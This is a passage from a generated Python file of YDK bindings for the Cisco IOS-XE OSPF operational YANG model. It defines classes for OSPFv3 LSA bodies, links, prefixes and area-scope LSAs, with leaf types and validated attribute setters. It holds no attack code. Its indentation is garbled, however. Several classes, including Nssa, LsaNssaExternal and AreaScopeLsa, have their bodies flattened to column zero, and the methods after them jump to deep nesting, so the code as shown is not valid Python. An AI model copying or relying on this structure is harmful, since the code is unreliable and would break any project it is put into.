        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
# Generated ydk binding for the OSPFv3 inter-area-prefix LSA body container.
class Prefix(Entity):
    """
    OSPFv3 inter area prefix

    .. attribute:: metric
    Metric
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: ia_prefix
    Inter area Prefix
    **type**\: str
    **config**\: False

    .. attribute:: ia_prefix_options
    Inter area prefix options
    **type**\: str
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize generated YANG metadata and leaf values."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__()

        self.yang_name = "prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
            ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
        ])
        self.metric = None
        self.ia_prefix = None
        self.ia_prefix_options = None
        self._segment_path = lambda: "prefix"
        # Freeze last: later attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate writes via ydk helper; listed names are the settable leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
# Generated ydk binding for the OSPFv3 inter-area-router LSA body container.
class IaRouter(Entity):
    """
    OSPFv3 inter area router

    .. attribute:: metric
    Metric
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: destination_router_id
    Router ID of the router being described by the LSA
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: lsa_ia_options
    Inter area LSA options
    **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize generated YANG metadata and leaf values."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()

        self.yang_name = "ia-router"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
            ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
        ])
        self.metric = None
        self.destination_router_id = None
        # Bit-flag leaf, modelled as a ydk Bits container.
        self.lsa_ia_options = Bits()
        self._segment_path = lambda: "ia-router"
        # Freeze last: later attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate writes via ydk helper; listed names are the settable leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
# Generated ydk binding for the OSPFv3 AS-external LSA body container.
class LsaExternal(Entity):
    """
    OSPFv3 LSA external

    .. attribute:: metric
    Metric
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: flags
    LSA Flags
    **type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags>`
    **config**\: False

    .. attribute:: referenced_ls_type
    Referenced Link State type
    **type**\: int
    **range:** 0..65535
    **config**\: False

    .. attribute:: external_prefix
    Prefix
    **type**\: str
    **config**\: False

    .. attribute:: external_prefix_options
    Prefix options
    **type**\: str
    **config**\: False

    .. attribute:: forwarding_address
    Forwarding address
    **type**\: union of the below types:
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **type**\: str
    **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
    **config**\: False

    .. attribute:: external_route_tag
    Route tag
    **type**\: int
    **range:** 0..4294967295
    **config**\: False

    .. attribute:: referenced_link_state_id
    Referenced Link State ID
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        """Initialize generated YANG metadata, leafs and the flags child."""
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()

        self.yang_name = "lsa-external"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None
        # Pre-construct and parent the "flags" child container.
        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"
        self._segment_path = lambda: "lsa-external"
        # Freeze last: later attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate writes via ydk helper; listed names are the settable leafs.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)

    # Generated ydk binding for the external-LSA flag bits.
    class Flags(Entity):
        """
        LSA Flags

        .. attribute:: e_flag
        When set, the metric specified is a Type 2 external metric
        **type**\: bool
        **config**\: False
        """

        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            """Initialize generated YANG metadata and leaf values."""
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()

            self.yang_name = "flags"
            self.yang_parent_name = "lsa-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
            ])
            self.e_flag = None
            self._segment_path = lambda: "flags"
            # Freeze last: later attribute writes are validated by __setattr__.
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Validate writes via ydk helper; listed names are the settable leafs.
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
"""
OSPFv3 NSSA
.. attribute:: lsa_nssa_external
NSSA LSA
**type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
"""
NSSA LSA
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
                                            # Route attribute writes through the Entity helper so only the
                                            # declared leaf names are assignable after construction.
                                            def __setattr__(self, name, value):
                                                self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
                                            class Flags(Entity):
                                                """
                                                LSA Flags
                                                .. attribute:: e_flag
                                                    When set, the metric specified is a Type 2 external metric
                                                    **type**\: bool
                                                    **config**\: False
                                                """
                                                # YANG module prefix/revision this binding was generated from.
                                                _prefix = 'ospf-ios-xe-oper'
                                                _revision = '2018-02-01'
                                                # Register this node's single leaf with the ydk runtime.
                                                def __init__(self):
                                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
                                                    self.yang_name = "flags"
                                                    self.yang_parent_name = "lsa-nssa-external"
                                                    self.is_top_level_class = False
                                                    self.has_list_ancestor = True
                                                    self.ylist_key_names = []
                                                    self._child_classes = OrderedDict([])
                                                    self._leafs = OrderedDict([
                                                        ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
                                                    ])
                                                    self.e_flag = None
                                                    self._segment_path = lambda: "flags"
                                                    # Freeze last; subsequent writes go via _perform_setattr.
                                                    self._is_frozen = True
                                                # Only the declared leaf is assignable after construction.
                                                def __setattr__(self, name, value):
                                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)
                                    class LinkData(Entity):
                                        """
                                        OSPFv3 Link data
                                        .. attribute:: rtr_priority
                                            Router priority of the interface
                                            **type**\: int
                                            **range:** 0..255
                                            **config**\: False
                                        .. attribute:: link_local_interface_address
                                            The originating router's link\-local interface address on the link
                                            **type**\: union of the below types:
                                            **type**\: str
                                            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                                            **type**\: str
                                            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
                                            **config**\: False
                                        .. attribute:: num_of_prefixes
                                            Number of prefixes
                                            **type**\: int
                                            **range:** 0..4294967295
                                            **config**\: False
                                        .. attribute:: lsa_id_options
                                            Link data LSA options
                                            **type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
                                            **config**\: False
                                        """
                                        # YANG module prefix/revision this binding was generated from.
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        # Register leaf descriptors for the "link-data" container.
                                        def __init__(self):
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__()
                                            self.yang_name = "link-data"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
                                                ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
                                                ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
                                                ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
                                            ])
                                            self.rtr_priority = None
                                            self.link_local_interface_address = None
                                            self.num_of_prefixes = None
                                            # Bitmask leaf gets an empty Bits container, not None.
                                            self.lsa_id_options = Bits()
                                            self._segment_path = lambda: "link-data"
                                            # Freeze last; subsequent writes go via _perform_setattr.
                                            self._is_frozen = True
                                        # Only the declared leaf names are assignable after construction.
                                        def __setattr__(self, name, value):
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)
                                    class IaPrefix(Entity):
                                        """
                                        OSPFv3 Intra area prefixes
                                        .. attribute:: referenced_ls_type
                                            Referenced Link State type
                                            **type**\: int
                                            **range:** 0..65535
                                            **config**\: False
                                        .. attribute:: referenced_link_state_id
                                            Referenced Link State ID
                                            **type**\: int
                                            **range:** 0..4294967295
                                            **config**\: False
                                        .. attribute:: referenced_adv_router
                                            Referenced Advertising Router
                                            **type**\: union of the below types:
                                            **type**\: str
                                            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
                                            **type**\: str
                                            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
                                            **config**\: False
                                        .. attribute:: num_of_prefixes
                                            Number of prefixes
                                            **type**\: int
                                            **range:** 0..65535
                                            **config**\: False
                                        """
                                        # YANG module prefix/revision this binding was generated from.
                                        _prefix = 'ospf-ios-xe-oper'
                                        _revision = '2018-02-01'
                                        # Register leaf descriptors for the "ia-prefix" container.
                                        def __init__(self):
                                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__()
                                            self.yang_name = "ia-prefix"
                                            self.yang_parent_name = "lsa-body"
                                            self.is_top_level_class = False
                                            self.has_list_ancestor = True
                                            self.ylist_key_names = []
                                            self._child_classes = OrderedDict([])
                                            self._leafs = OrderedDict([
                                                ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                                                ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
                                                ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
                                                ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
                                            ])
                                            self.referenced_ls_type = None
                                            self.referenced_link_state_id = None
                                            self.referenced_adv_router = None
                                            self.num_of_prefixes = None
                                            self._segment_path = lambda: "ia-prefix"
                                            # Freeze last; subsequent writes go via _perform_setattr.
                                            self._is_frozen = True
                                        # Only the declared leaf names are assignable after construction.
                                        def __setattr__(self, name, value):
                                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value)
                            class Ospfv3Link(Entity):
                                """
                                OSPFv3 links
                                .. attribute:: interface_id (key)
                                    Interface ID
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False
                                .. attribute:: neighbor_interface_id (key)
                                    Neighbor interface ID
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False
                                .. attribute:: neighbor_router_id (key)
                                    Neighbor router ID
                                    **type**\: int
                                    **range:** 0..4294967295
                                    **config**\: False
                                .. attribute:: type
                                    Link type
                                    **type**\: int
                                    **range:** 0..255
                                    **config**\: False
                                .. attribute:: metric
                                    Metric
                                    **type**\: int
                                    **range:** 0..65535
                                    **config**\: False
                                """
                                # YANG module prefix/revision this binding was generated from.
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                # List entry keyed by (interface-id, neighbor-interface-id,
                                # neighbor-router-id); keys are baked into the segment path.
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__()
                                    self.yang_name = "ospfv3-link"
                                    self.yang_parent_name = "area-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
                                        ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
                                        ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
                                        ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
                                        ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
                                    ])
                                    self.interface_id = None
                                    self.neighbor_interface_id = None
                                    self.neighbor_router_id = None
                                    self.type = None
                                    self.metric = None
                                    # Lambda so the path reflects the current key values.
                                    self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']"
                                    # Freeze last; subsequent writes go via _perform_setattr.
                                    self._is_frozen = True
                                # Only the declared leaf names are assignable after construction.
                                def __setattr__(self, name, value):
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value)
                            class Ospfv3Prefix(Entity):
                                """
                                OSPFv3 prefix\-list
                                .. attribute:: prefix (key)
                                    Prefix
                                    **type**\: str
                                    **config**\: False
                                .. attribute:: prefix_options
                                    Prefix options
                                    **type**\: str
                                    **config**\: False
                                """
                                # YANG module prefix/revision this binding was generated from.
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                # List entry keyed by "prefix"; key baked into the segment path.
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__()
                                    self.yang_name = "ospfv3-prefix"
                                    self.yang_parent_name = "area-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['prefix']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                        ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                                    ])
                                    self.prefix = None
                                    self.prefix_options = None
                                    self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']"
                                    # Freeze last; subsequent writes go via _perform_setattr.
                                    self._is_frozen = True
                                # Only the declared leaf names are assignable after construction.
                                def __setattr__(self, name, value):
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value)
                            class Ospfv3IaPrefix(Entity):
                                """
                                OSPFv3 intra\-area prefix\-list
                                .. attribute:: prefix (key)
                                    Prefix
                                    **type**\: str
                                    **config**\: False
                                .. attribute:: prefix_options
                                    Prefix options
                                    **type**\: str
                                    **config**\: False
                                """
                                # YANG module prefix/revision this binding was generated from.
                                _prefix = 'ospf-ios-xe-oper'
                                _revision = '2018-02-01'
                                # List entry keyed by "prefix"; key baked into the segment path.
                                def __init__(self):
                                    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__()
                                    self.yang_name = "ospfv3-ia-prefix"
                                    self.yang_parent_name = "area-scope-lsa"
                                    self.is_top_level_class = False
                                    self.has_list_ancestor = True
                                    self.ylist_key_names = ['prefix']
                                    self._child_classes = OrderedDict([])
                                    self._leafs = OrderedDict([
                                        ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
                                        ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
                                    ])
                                    self.prefix = None
                                    self.prefix_options = None
                                    self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']"
                                    # Freeze last; subsequent writes go via _perform_setattr.
                                    self._is_frozen = True
                                # Only the declared leaf names are assignable after construction.
                                def __setattr__(self, name, value):
                                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value)
                    class IntfMultiTopology(Entity):
                        """
                        OSPF interface topology
                        .. attribute:: name (key)
                            One of the topology enabled on this interface
                            **type**\: str
                            **config**\: False
                        """
                        # YANG module prefix/revision this binding was generated from.
                        _prefix = 'ospf-ios-xe-oper'
                        _revision = '2018-02-01'
                        # List entry keyed by "name"; key baked into the segment path.
                        def __init__(self):
                            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, self).__init__()
                            self.yang_name = "intf-multi-topology"
                            self.yang_parent_name = "ospf-interface"
                            self.is_top_level_class = False
                            self.has_list_ancestor = True
                            self.ylist_key_names = ['name']
                            self._child_classes = OrderedDict([])
                            self._leafs = OrderedDict([
                                ('name', (YLeaf(YType.str, 'name'), ['str'])),
                            ])
                            self.name = None
                            self._segment_path = lambda: "intf-multi-topology" + "[name='" + str(self.name) + "']"
                            # Freeze last; subsequent writes go via _perform_setattr.
                            self._is_frozen = True
                        # Only the declared leaf is assignable after construction.
                        def __setattr__(self, name, value):
                            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, ['name'], name, value)
class AreaScopeLsa(Entity):
"""
List of OSPF area scope LSA
.. attribute:: lsa_type (key)
OSPF link scope LSA type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: area_scope_lsa
List of OSPF link scope LSAs
**type**\: list of :py:class:`AreaScopeLsa_ <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
                # Keyed list of area-scope LSAs grouped by LSA type; the inner
                # "area-scope-lsa" entries live in the YList child.
                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, self).__init__()
                    self.yang_name = "area-scope-lsa"
                    self.yang_parent_name = "ospf-area"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
